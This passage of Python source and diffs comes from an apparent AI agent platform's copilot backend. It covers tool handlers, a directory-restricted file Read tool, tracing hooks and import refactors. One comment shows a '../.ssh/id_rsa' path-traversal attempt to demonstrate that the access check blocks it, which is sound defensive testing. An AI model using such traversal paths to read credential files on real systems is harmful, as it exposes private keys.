            # The response adapter will pop this for frontend widget rendering.
            pending = _pending_tool_outputs.get(None)
            if pending is not None:
                pending[base_tool.name] = text

            return {
                "content": [{"type": "text", "text": text}],
                "isError": not result.success,
            }

        except Exception as e:
            logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
            return {
                "content": [
                    {
                        "type": "text",
                        "text": json.dumps(
                            {
                                "error": str(e),
                                "type": "error",
                                "message": f"Failed to execute {base_tool.name}",
                            }
                        ),
                    }
                ],
                "isError": True,
            }

    return tool_handler


def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
    """Build a JSON Schema input schema for a tool."""
    return {
        "type": "object",
        "properties": base_tool.parameters.get("properties", {}),
        "required": base_tool.parameters.get("required", []),
    }


def get_tool_definitions() -> list[dict[str, Any]]:
    """Get all tool definitions in MCP format.

    Returns a list of tool definitions that can be used with
    create_sdk_mcp_server or as raw tool definitions.
    """
    tool_definitions = []

    for tool_name, base_tool in TOOL_REGISTRY.items():
        tool_def = {
            "name": tool_name,
            "description": base_tool.description,
            "inputSchema": _build_input_schema(base_tool),
        }
        tool_definitions.append(tool_def)

    return tool_definitions


def get_tool_handlers() -> dict[str, Any]:
    """Get all tool handlers mapped by name.

    Returns a dictionary mapping tool names to their handler functions.
    """
    handlers = {}

    for tool_name, base_tool in TOOL_REGISTRY.items():
        handlers[tool_name] = create_tool_handler(base_tool)

    return handlers


async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
    """Read a file with optional offset/limit. Restricted to the SDK working directory.

    After reading, the file is deleted to prevent accumulation in long-running pods.
    """
    file_path = args.get("file_path", "")
    offset = args.get("offset", 0)
    limit = args.get("limit", 2000)

    # Security: only allow reads under the SDK's working directory
    real_path = os.path.realpath(file_path)
    if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
        return {
            "content": [{"type": "text", "text": f"Access denied: {file_path}"}],
            "isError": True,
        }

    try:
        with open(real_path) as f:
            lines = f.readlines()
        selected = lines[offset : offset + limit]
        content = "".join(selected)
        return {"content": [{"type": "text", "text": content}], "isError": False}
    except FileNotFoundError:
        return {
            "content": [{"type": "text", "text": f"File not found: {file_path}"}],
            "isError": True,
        }
    except Exception as e:
        return {
            "content": [{"type": "text", "text": f"Error reading file: {e}"}],
            "isError": True,
        }
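
# Editor's sketch of why realpath matters in the check above: it collapses
# ".." and symlinks before the prefix comparison, so traversal attempts
# resolve outside the allowed directory (paths here are illustrative):
#
#     >>> import os
#     >>> allowed = os.path.expanduser("~/.claude/")
#     >>> candidate = os.path.expanduser("~/.claude/../.ssh/id_rsa")
#     >>> os.path.realpath(candidate).startswith(allowed)
#     False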


_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
    "Read a file from the local filesystem. "
    "Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
    "type": "object",
    "properties": {
        "file_path": {
            "type": "string",
            "description": "The absolute path to the file to read",
        },
        "offset": {
            "type": "integer",
            "description": "Line number to start reading from (0-indexed). Default: 0",
        },
        "limit": {
            "type": "integer",
            "description": "Number of lines to read. Default: 2000",
        },
    },
    "required": ["file_path"],
}


# Create the MCP server configuration
def create_copilot_mcp_server():
    """Create an in-process MCP server configuration for CoPilot tools.

    This can be passed to ClaudeAgentOptions.mcp_servers.

    Note: The actual SDK MCP server creation depends on the claude-agent-sdk
    package being available. This function returns the configuration that
    can be used with the SDK.
    """
    try:
        from claude_agent_sdk import create_sdk_mcp_server, tool

        # Create decorated tool functions
        sdk_tools = []

        for tool_name, base_tool in TOOL_REGISTRY.items():
            handler = create_tool_handler(base_tool)
            decorated = tool(
                tool_name,
                base_tool.description,
                _build_input_schema(base_tool),
            )(handler)
            sdk_tools.append(decorated)

        # Add the Read tool so the SDK can read back oversized tool results
        read_tool = tool(
            _READ_TOOL_NAME,
            _READ_TOOL_DESCRIPTION,
            _READ_TOOL_SCHEMA,
        )(_read_file_handler)
        sdk_tools.append(read_tool)

        server = create_sdk_mcp_server(
            name=MCP_SERVER_NAME,
            version="1.0.0",
            tools=sdk_tools,
        )

        return server

    except ImportError:
        # Let ImportError propagate so service.py handles the fallback
        raise


# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]

# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
    *[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
    f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
    *_SDK_BUILTIN_TOOLS,
]
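
# Editor's sketch of the naming scheme above, with hypothetical registry keys
# "find_block" and "run_block"; COPILOT_TOOL_NAMES would then expand to:
#
#     ["mcp__copilot__find_block", "mcp__copilot__run_block",
#      "mcp__copilot__Read", "Read", "Write", "Edit", "Glob", "Grep", "Bash"]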
@@ -1,426 +0,0 @@
"""Langfuse tracing integration for Claude Agent SDK.

This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.

Usage:
    async with TracedSession(session_id, user_id) as tracer:
        # Your SDK code here
        tracer.log_user_message(message)
        async for sdk_msg in client.receive_messages():
            tracer.log_sdk_message(sdk_msg)
        tracer.log_result(result_message)
"""

from __future__ import annotations

import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any

from backend.util.settings import Settings

if TYPE_CHECKING:
    from claude_agent_sdk import Message, ResultMessage

logger = logging.getLogger(__name__)
settings = Settings()


def _is_langfuse_configured() -> bool:
    """Check if Langfuse credentials are configured."""
    return bool(
        settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
    )


@dataclass
class ToolSpan:
    """Tracks a single tool call for tracing."""

    tool_call_id: str
    tool_name: str
    input: dict[str, Any]
    start_time: float = field(default_factory=time.perf_counter)
    output: str | None = None
    success: bool = True
    end_time: float | None = None


@dataclass
class GenerationSpan:
    """Tracks an LLM generation (text output) for tracing."""

    text: str = ""
    start_time: float = field(default_factory=time.perf_counter)
    end_time: float | None = None
    tool_calls: list[ToolSpan] = field(default_factory=list)


class TracedSession:
    """Context manager for tracing a Claude Agent SDK session with Langfuse.

    Automatically creates a trace with:
    - Session-level metadata (user_id, session_id)
    - Generation spans for LLM outputs
    - Tool call spans with input/output
    - Token usage and cost (from ResultMessage)

    If Langfuse is not configured, all methods are no-ops.
    """

    def __init__(
        self,
        session_id: str,
        user_id: str | None = None,
        system_prompt: str | None = None,
    ):
        self.session_id = session_id
        self.user_id = user_id
        self.system_prompt = system_prompt
        self.enabled = _is_langfuse_configured()

        # Internal state
        self._trace: Any = None
        self._langfuse: Any = None
        self._user_message: str | None = None
        self._generations: list[GenerationSpan] = []
        self._current_generation: GenerationSpan | None = None
        self._pending_tools: dict[str, ToolSpan] = {}
        self._start_time: float = 0

    async def __aenter__(self) -> TracedSession:
        """Start the trace."""
        if not self.enabled:
            return self

        try:
            from langfuse import get_client

            self._langfuse = get_client()
            self._start_time = time.perf_counter()

            # Create the root trace
            self._trace = self._langfuse.trace(
                name="copilot-sdk-session",
                session_id=self.session_id,
                user_id=self.user_id,
                metadata={
                    "sdk": "claude-agent-sdk",
                    "has_system_prompt": bool(self.system_prompt),
                },
            )
            logger.debug(f"[Tracing] Started trace for session {self.session_id}")

        except Exception as e:
            logger.warning(f"[Tracing] Failed to start trace: {e}")
            self.enabled = False

        return self

    async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
        """End the trace and flush to Langfuse."""
        if not self.enabled or not self._trace:
            return

        try:
            # Finalize any open generation
            self._finalize_current_generation()

            # Add generations as spans
            for gen in self._generations:
                self._trace.span(
                    name="llm-generation",
                    start_time=gen.start_time,
                    end_time=gen.end_time or time.perf_counter(),
                    output=gen.text[:1000] if gen.text else None,  # Truncate
                    metadata={"tool_calls": len(gen.tool_calls)},
                )

                # Add tool calls as nested spans
                for tool in gen.tool_calls:
                    self._trace.span(
                        name=f"tool:{tool.tool_name}",
                        start_time=tool.start_time,
                        end_time=tool.end_time or time.perf_counter(),
                        input=tool.input,
                        output=tool.output[:500] if tool.output else None,
                        metadata={
                            "tool_call_id": tool.tool_call_id,
                            "success": tool.success,
                        },
                    )

            # Update trace with final status
            status = "error" if exc_type else "success"
            self._trace.update(
                output=self._generations[-1].text[:500] if self._generations else None,
                metadata={"status": status, "num_generations": len(self._generations)},
            )

            # Flush asynchronously (Langfuse handles this in background)
            logger.debug(
                f"[Tracing] Completed trace for session {self.session_id}, "
                f"{len(self._generations)} generations"
            )

        except Exception as e:
            logger.warning(f"[Tracing] Failed to finalize trace: {e}")

    def log_user_message(self, message: str) -> None:
        """Log the user's input message."""
        if not self.enabled or not self._trace:
            return

        self._user_message = message
        try:
            self._trace.update(input=message[:1000])
        except Exception as e:
            logger.debug(f"[Tracing] Failed to log user message: {e}")

    def log_sdk_message(self, sdk_message: Message) -> None:
        """Log an SDK message (automatically categorizes by type)."""
        if not self.enabled:
            return

        try:
            from claude_agent_sdk import (
                AssistantMessage,
                ResultMessage,
                TextBlock,
                ToolResultBlock,
                ToolUseBlock,
                UserMessage,
            )

            if isinstance(sdk_message, AssistantMessage):
                # Start a new generation if needed
                if self._current_generation is None:
                    self._current_generation = GenerationSpan()
                    self._generations.append(self._current_generation)

                for block in sdk_message.content:
                    if isinstance(block, TextBlock) and block.text:
                        self._current_generation.text += block.text

                    elif isinstance(block, ToolUseBlock):
                        tool_span = ToolSpan(
                            tool_call_id=block.id,
                            tool_name=block.name,
                            input=block.input or {},
                        )
                        self._pending_tools[block.id] = tool_span
                        if self._current_generation:
                            self._current_generation.tool_calls.append(tool_span)

            elif isinstance(sdk_message, UserMessage):
                # UserMessage carries tool results
                content = sdk_message.content
                blocks = content if isinstance(content, list) else []
                for block in blocks:
                    if isinstance(block, ToolResultBlock) and block.tool_use_id:
                        tool_span = self._pending_tools.get(block.tool_use_id)
                        if tool_span:
                            tool_span.end_time = time.perf_counter()
                            tool_span.success = not (block.is_error or False)
                            tool_span.output = self._extract_tool_output(block.content)

                # After tool results, finalize current generation
                # (SDK will start a new AssistantMessage for continuation)
                self._finalize_current_generation()

            elif isinstance(sdk_message, ResultMessage):
                self._log_result(sdk_message)

        except Exception as e:
            logger.debug(f"[Tracing] Failed to log SDK message: {e}")

    def _log_result(self, result: ResultMessage) -> None:
        """Log the final result with usage and cost."""
        if not self.enabled or not self._trace:
            return

        try:
            # Extract usage info
            usage = result.usage or {}
            metadata: dict[str, Any] = {
                "duration_ms": result.duration_ms,
                "duration_api_ms": result.duration_api_ms,
                "num_turns": result.num_turns,
                "is_error": result.is_error,
            }

            if result.total_cost_usd is not None:
                metadata["cost_usd"] = result.total_cost_usd

            if usage:
                metadata["usage"] = usage

            self._trace.update(metadata=metadata)

            # Log as a generation for proper Langfuse cost/usage tracking
            if usage or result.total_cost_usd:
                self._trace.generation(
                    name="claude-sdk-completion",
                    model="claude-sonnet-4-20250514",  # SDK default model
                    usage=(
                        {
                            "input": usage.get("input_tokens", 0),
                            "output": usage.get("output_tokens", 0),
                            "total": usage.get("input_tokens", 0)
                            + usage.get("output_tokens", 0),
                        }
                        if usage
                        else None
                    ),
                    metadata={"cost_usd": result.total_cost_usd},
                )

            logger.debug(
                f"[Tracing] Logged result: {result.num_turns} turns, "
                f"${result.total_cost_usd:.4f} cost"
                if result.total_cost_usd
                else f"[Tracing] Logged result: {result.num_turns} turns"
            )

        except Exception as e:
            logger.debug(f"[Tracing] Failed to log result: {e}")

    def _finalize_current_generation(self) -> None:
        """Mark the current generation as complete."""
        if self._current_generation:
            self._current_generation.end_time = time.perf_counter()
            self._current_generation = None

    @staticmethod
    def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
        """Extract string output from tool result content."""
        if isinstance(content, str):
            return content
        if isinstance(content, list):
            parts = [
                item.get("text", "") for item in content if item.get("type") == "text"
            ]
            return "".join(parts) if parts else str(content)
        return str(content) if content else ""
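
# Editor's behavior sketch for _extract_tool_output (inputs -> outputs):
#
#     "plain text"                                                   -> "plain text"
#     [{"type": "text", "text": "a"}, {"type": "text", "text": "b"}] -> "ab"
#     [{"type": "image", "data": "..."}]                             -> str(...) fallback
#     None                                                           -> ""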


@asynccontextmanager
async def traced_session(
    session_id: str,
    user_id: str | None = None,
    system_prompt: str | None = None,
):
    """Convenience async context manager for tracing SDK sessions.

    Usage:
        async with traced_session(session_id, user_id) as tracer:
            tracer.log_user_message(message)
            async for msg in client.receive_messages():
                tracer.log_sdk_message(msg)
    """
    tracer = TracedSession(session_id, user_id, system_prompt)
    async with tracer:
        yield tracer


def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
    """Create SDK hooks for fine-grained Langfuse tracing.

    These hooks capture precise timing for tool executions and failures
    that may not be visible in the message stream.

    Designed to be merged with security hooks:
        hooks = {**security_hooks, **create_tracing_hooks(tracer)}

    Args:
        tracer: The active TracedSession instance

    Returns:
        Hooks configuration dict for ClaudeAgentOptions
    """
    if not tracer.enabled:
        return {}

    try:
        from claude_agent_sdk import HookMatcher
        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput

        async def trace_pre_tool_use(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Record tool start time for accurate duration tracking."""
            _ = context
            if not tool_use_id:
                return {}
            tool_name = str(input_data.get("tool_name", "unknown"))
            tool_input = input_data.get("tool_input", {})

            # Record start time in pending tools
            tracer._pending_tools[tool_use_id] = ToolSpan(
                tool_call_id=tool_use_id,
                tool_name=tool_name,
                input=tool_input if isinstance(tool_input, dict) else {},
            )
            return {}

        async def trace_post_tool_use(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Record tool completion for duration calculation."""
            _ = context
            if tool_use_id and tool_use_id in tracer._pending_tools:
                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
                tracer._pending_tools[tool_use_id].success = True
            return {}

        async def trace_post_tool_failure(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Record tool failures for error tracking."""
            _ = context
            if tool_use_id and tool_use_id in tracer._pending_tools:
                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
                tracer._pending_tools[tool_use_id].success = False
                error = input_data.get("error", "Unknown error")
                tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
            return {}

        return {
            "PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
            "PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
            "PostToolUseFailure": [
                HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
            ],
        }

    except ImportError:
        logger.debug("[Tracing] SDK not available for hook-based tracing")
        return {}


def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
    """Merge multiple hook configurations into one.

    Combines hook matchers for the same event type, allowing both
    security and tracing hooks to coexist.

    Usage:
        combined = merge_hooks(security_hooks, tracing_hooks)
    """
    result: dict[str, list[Any]] = {}
    for hook_dict in hook_dicts:
        for event_name, matchers in hook_dict.items():
            if event_name not in result:
                result[event_name] = []
            result[event_name].extend(matchers)
    return result
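
# Editor's sketch of merge_hooks semantics (plain strings stand in for the
# real HookMatcher objects):
#
#     security = {"PreToolUse": ["security_matcher"]}
#     tracing = {"PreToolUse": ["tracing_matcher"], "PostToolUse": ["timing_matcher"]}
#     assert merge_hooks(security, tracing) == {
#         "PreToolUse": ["security_matcher", "tracing_matcher"],
#         "PostToolUse": ["timing_matcher"],
#     }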
@@ -245,16 +245,12 @@ async def _get_system_prompt_template(context: str) -> str:
     return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
 
 
-async def _build_system_prompt(
-    user_id: str | None, has_conversation_history: bool = False
-) -> tuple[str, Any]:
+async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
     """Build the full system prompt including business understanding if available.
 
     Args:
-        user_id: The user ID for fetching business understanding.
-        has_conversation_history: Whether there's existing conversation history.
-            If True, we don't tell the model to greet/introduce (since they're
-            already in a conversation).
+        user_id: The user ID for fetching business understanding
+            If "default" and this is the user's first session, will use "onboarding" instead.
 
     Returns:
         Tuple of (compiled prompt string, business understanding object)

@@ -270,8 +266,6 @@ async def _build_system_prompt(
 
     if understanding:
         context = format_understanding_for_prompt(understanding)
-    elif has_conversation_history:
-        context = "No prior understanding saved yet. Continue the existing conversation naturally."
     else:
         context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"

@@ -380,6 +374,7 @@ async def stream_chat_completion(
 
     Raises:
         NotFoundError: If session_id is invalid
+        ValueError: If max_context_messages is exceeded
 
     """
     completion_start = time.monotonic()

@@ -464,9 +459,8 @@ async def stream_chat_completion(
 
     # Generate title for new sessions on first user message (non-blocking)
     # Check: is_user_message, no title yet, and this is the first user message
-    user_messages = [m for m in session.messages if m.role == "user"]
-    first_user_msg = message or (user_messages[0].content if user_messages else None)
-    if is_user_message and first_user_msg and not session.title:
+    if is_user_message and message and not session.title:
+        user_messages = [m for m in session.messages if m.role == "user"]
         if len(user_messages) == 1:
             # First user message - generate title in background
             import asyncio

@@ -474,7 +468,7 @@ async def stream_chat_completion(
             # Capture only the values we need (not the session object) to avoid
             # stale data issues when the main flow modifies the session
             captured_session_id = session_id
-            captured_message = first_user_msg
+            captured_message = message
            captured_user_id = user_id
 
            async def _update_title():

@@ -806,9 +800,13 @@ async def stream_chat_completion(
     # Build the messages list in the correct order
     messages_to_save: list[ChatMessage] = []
 
-    # Add assistant message with tool_calls if any
+    # Add assistant message with tool_calls if any.
+    # Use extend (not assign) to preserve tool_calls already added by
+    # _yield_tool_call for long-running tools.
     if accumulated_tool_calls:
-        assistant_response.tool_calls = accumulated_tool_calls
+        if not assistant_response.tool_calls:
+            assistant_response.tool_calls = []
+        assistant_response.tool_calls.extend(accumulated_tool_calls)
         logger.info(
             f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
         )
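(Editor's note on the extend-versus-assign hunk above: _yield_tool_call may have attached tool calls to the assistant message already, so a plain assignment would drop them. A sketch with stand-in values:

    existing = [{"id": "call_1"}]      # attached earlier by _yield_tool_call
    accumulated = [{"id": "call_2"}]   # gathered while streaming
    tool_calls = list(existing)
    tool_calls.extend(accumulated)     # keeps both; assignment would keep only call_2
)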
@@ -1239,7 +1237,7 @@ async def _stream_chat_chunks(
|
|||||||
|
|
||||||
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
|
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
|
||||||
f"session={session.session_id}, user={session.user_id}",
|
f"session={session.session_id}, user={session.user_id}",
|
||||||
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
||||||
)
|
)
|
||||||
@@ -1410,13 +1408,9 @@ async def _yield_tool_call(
|
|||||||
operation_id=operation_id,
|
operation_id=operation_id,
|
||||||
)
|
)
|
||||||
|
|
||||||
# Save assistant message with tool_call FIRST (required by LLM)
|
# Attach the tool_call to the current turn's assistant message
|
||||||
assistant_message = ChatMessage(
|
# (or create one if this is a tool-only response with no text).
|
||||||
role="assistant",
|
session.add_tool_call_to_current_turn(tool_calls[yield_idx])
|
||||||
content="",
|
|
||||||
tool_calls=[tool_calls[yield_idx]],
|
|
||||||
)
|
|
||||||
session.messages.append(assistant_message)
|
|
||||||
|
|
||||||
# Then save pending tool result
|
# Then save pending tool result
|
||||||
pending_message = ChatMessage(
|
pending_message = ChatMessage(
|
||||||
|
|||||||
@@ -814,28 +814,6 @@ async def get_active_task_for_session(
|
|||||||
if task_user_id and user_id != task_user_id:
|
if task_user_id and user_id != task_user_id:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Auto-expire stale tasks that exceeded stream_timeout
|
|
||||||
created_at_str = meta.get("created_at", "")
|
|
||||||
if created_at_str:
|
|
||||||
try:
|
|
||||||
created_at = datetime.fromisoformat(created_at_str)
|
|
||||||
age_seconds = (
|
|
||||||
datetime.now(timezone.utc) - created_at
|
|
||||||
).total_seconds()
|
|
||||||
if age_seconds > config.stream_timeout:
|
|
||||||
logger.warning(
|
|
||||||
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
|
|
||||||
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
|
|
||||||
)
|
|
||||||
await mark_task_completed(task_id, "failed")
|
|
||||||
continue
|
|
||||||
except (ValueError, TypeError):
|
|
||||||
pass
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
|
|
||||||
)
|
|
||||||
|
|
||||||
# Get the last message ID from Redis Stream
|
# Get the last message ID from Redis Stream
|
||||||
stream_key = _get_task_stream_key(task_id)
|
stream_key = _get_task_stream_key(task_id)
|
||||||
last_id = "0-0"
|
last_id = "0-0"
|
||||||
|
|||||||
@@ -13,7 +13,8 @@ from backend.api.features.chat.tools.models import (
|
|||||||
NoResultsResponse,
|
NoResultsResponse,
|
||||||
)
|
)
|
||||||
from backend.api.features.store.hybrid_search import unified_hybrid_search
|
from backend.api.features.store.hybrid_search import unified_hybrid_search
|
||||||
from backend.data.block import BlockType, get_block
|
from backend.blocks import get_block
|
||||||
|
from backend.blocks._base import BlockType
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|||||||
@@ -10,7 +10,7 @@ from backend.api.features.chat.tools.find_block import (
|
|||||||
FindBlockTool,
|
FindBlockTool,
|
||||||
)
|
)
|
||||||
from backend.api.features.chat.tools.models import BlockListResponse
|
from backend.api.features.chat.tools.models import BlockListResponse
|
||||||
from backend.data.block import BlockType
|
from backend.blocks._base import BlockType
|
||||||
|
|
||||||
from ._test_data import make_session
|
from ._test_data import make_session
|
||||||
|
|
||||||
|
|||||||
@@ -335,17 +335,11 @@ class BlockInfoSummary(BaseModel):
|
|||||||
name: str
|
name: str
|
||||||
description: str
|
description: str
|
||||||
categories: list[str]
|
categories: list[str]
|
||||||
input_schema: dict[str, Any] = Field(
|
input_schema: dict[str, Any]
|
||||||
default_factory=dict,
|
output_schema: dict[str, Any]
|
||||||
description="Full JSON schema for block inputs",
|
|
||||||
)
|
|
||||||
output_schema: dict[str, Any] = Field(
|
|
||||||
default_factory=dict,
|
|
||||||
description="Full JSON schema for block outputs",
|
|
||||||
)
|
|
||||||
required_inputs: list[BlockInputFieldInfo] = Field(
|
required_inputs: list[BlockInputFieldInfo] = Field(
|
||||||
default_factory=list,
|
default_factory=list,
|
||||||
description="List of input fields for this block",
|
description="List of required input fields for this block",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@@ -358,7 +352,7 @@ class BlockListResponse(ToolResponseBase):
|
|||||||
query: str
|
query: str
|
||||||
usage_hint: str = Field(
|
usage_hint: str = Field(
|
||||||
default="To execute a block, call run_block with block_id set to the block's "
|
default="To execute a block, call run_block with block_id set to the block's "
|
||||||
"'id' field and input_data containing the fields listed in required_inputs."
|
"'id' field and input_data containing the required fields from input_schema."
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -12,7 +12,8 @@ from backend.api.features.chat.tools.find_block import (
|
|||||||
COPILOT_EXCLUDED_BLOCK_IDS,
|
COPILOT_EXCLUDED_BLOCK_IDS,
|
||||||
COPILOT_EXCLUDED_BLOCK_TYPES,
|
COPILOT_EXCLUDED_BLOCK_TYPES,
|
||||||
)
|
)
|
||||||
from backend.data.block import AnyBlockSchema, get_block
|
from backend.blocks import get_block
|
||||||
|
from backend.blocks._base import AnyBlockSchema
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
|
from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
|
||||||
from backend.data.workspace import get_or_create_workspace
|
from backend.data.workspace import get_or_create_workspace
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ import pytest
|
|||||||
|
|
||||||
from backend.api.features.chat.tools.models import ErrorResponse
|
from backend.api.features.chat.tools.models import ErrorResponse
|
||||||
from backend.api.features.chat.tools.run_block import RunBlockTool
|
from backend.api.features.chat.tools.run_block import RunBlockTool
|
||||||
from backend.data.block import BlockType
|
from backend.blocks._base import BlockType
|
||||||
|
|
||||||
from ._test_data import make_session
|
from ._test_data import make_session
|
||||||
|
|
||||||
|
|||||||
@@ -12,12 +12,11 @@ import backend.api.features.store.image_gen as store_image_gen
|
|||||||
import backend.api.features.store.media as store_media
|
import backend.api.features.store.media as store_media
|
||||||
import backend.data.graph as graph_db
|
import backend.data.graph as graph_db
|
||||||
import backend.data.integrations as integrations_db
|
import backend.data.integrations as integrations_db
|
||||||
from backend.data.block import BlockInput
|
|
||||||
from backend.data.db import transaction
|
from backend.data.db import transaction
|
||||||
from backend.data.execution import get_graph_execution
|
from backend.data.execution import get_graph_execution
|
||||||
from backend.data.graph import GraphSettings
|
from backend.data.graph import GraphSettings
|
||||||
from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
|
from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
|
||||||
from backend.data.model import CredentialsMetaInput
|
from backend.data.model import CredentialsMetaInput, GraphInput
|
||||||
from backend.integrations.creds_manager import IntegrationCredentialsManager
|
from backend.integrations.creds_manager import IntegrationCredentialsManager
|
||||||
from backend.integrations.webhooks.graph_lifecycle_hooks import (
|
from backend.integrations.webhooks.graph_lifecycle_hooks import (
|
||||||
on_graph_activate,
|
on_graph_activate,
|
||||||
@@ -1130,7 +1129,7 @@ async def create_preset_from_graph_execution(
|
|||||||
async def update_preset(
|
async def update_preset(
|
||||||
user_id: str,
|
user_id: str,
|
||||||
preset_id: str,
|
preset_id: str,
|
||||||
inputs: Optional[BlockInput] = None,
|
inputs: Optional[GraphInput] = None,
|
||||||
credentials: Optional[dict[str, CredentialsMetaInput]] = None,
|
credentials: Optional[dict[str, CredentialsMetaInput]] = None,
|
||||||
name: Optional[str] = None,
|
name: Optional[str] = None,
|
||||||
description: Optional[str] = None,
|
description: Optional[str] = None,
|
||||||
|
|||||||
@@ -6,9 +6,12 @@ import prisma.enums
|
|||||||
import prisma.models
|
import prisma.models
|
||||||
import pydantic
|
import pydantic
|
||||||
|
|
||||||
from backend.data.block import BlockInput
|
|
||||||
from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
|
from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
|
||||||
from backend.data.model import CredentialsMetaInput, is_credentials_field_name
|
from backend.data.model import (
|
||||||
|
CredentialsMetaInput,
|
||||||
|
GraphInput,
|
||||||
|
is_credentials_field_name,
|
||||||
|
)
|
||||||
from backend.util.json import loads as json_loads
|
from backend.util.json import loads as json_loads
|
||||||
from backend.util.models import Pagination
|
from backend.util.models import Pagination
|
||||||
|
|
||||||
@@ -323,7 +326,7 @@ class LibraryAgentPresetCreatable(pydantic.BaseModel):
|
|||||||
graph_id: str
|
graph_id: str
|
||||||
graph_version: int
|
graph_version: int
|
||||||
|
|
||||||
inputs: BlockInput
|
inputs: GraphInput
|
||||||
credentials: dict[str, CredentialsMetaInput]
|
credentials: dict[str, CredentialsMetaInput]
|
||||||
|
|
||||||
name: str
|
name: str
|
||||||
@@ -352,7 +355,7 @@ class LibraryAgentPresetUpdatable(pydantic.BaseModel):
|
|||||||
Request model used when updating a preset for a library agent.
|
Request model used when updating a preset for a library agent.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
inputs: Optional[BlockInput] = None
|
inputs: Optional[GraphInput] = None
|
||||||
credentials: Optional[dict[str, CredentialsMetaInput]] = None
|
credentials: Optional[dict[str, CredentialsMetaInput]] = None
|
||||||
|
|
||||||
name: Optional[str] = None
|
name: Optional[str] = None
|
||||||
@@ -395,7 +398,7 @@ class LibraryAgentPreset(LibraryAgentPresetCreatable):
|
|||||||
"Webhook must be included in AgentPreset query when webhookId is set"
|
"Webhook must be included in AgentPreset query when webhookId is set"
|
||||||
)
|
)
|
||||||
|
|
||||||
input_data: BlockInput = {}
|
input_data: GraphInput = {}
|
||||||
input_credentials: dict[str, CredentialsMetaInput] = {}
|
input_credentials: dict[str, CredentialsMetaInput] = {}
|
||||||
|
|
||||||
for preset_input in preset.InputPresets:
|
for preset_input in preset.InputPresets:
|
||||||
|
|||||||
@@ -5,8 +5,8 @@ from typing import Optional
|
|||||||
import aiohttp
|
import aiohttp
|
||||||
from fastapi import HTTPException
|
from fastapi import HTTPException
|
||||||
|
|
||||||
|
from backend.blocks import get_block
|
||||||
from backend.data import graph as graph_db
|
from backend.data import graph as graph_db
|
||||||
from backend.data.block import get_block
|
|
||||||
from backend.util.settings import Settings
|
from backend.util.settings import Settings
|
||||||
|
|
||||||
from .models import ApiResponse, ChatRequest, GraphData
|
from .models import ApiResponse, ChatRequest, GraphData
|
||||||
|
|||||||
@@ -152,7 +152,7 @@ class BlockHandler(ContentHandler):
|
|||||||
|
|
||||||
async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
|
async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
|
||||||
"""Fetch blocks without embeddings."""
|
"""Fetch blocks without embeddings."""
|
||||||
from backend.data.block import get_blocks
|
from backend.blocks import get_blocks
|
||||||
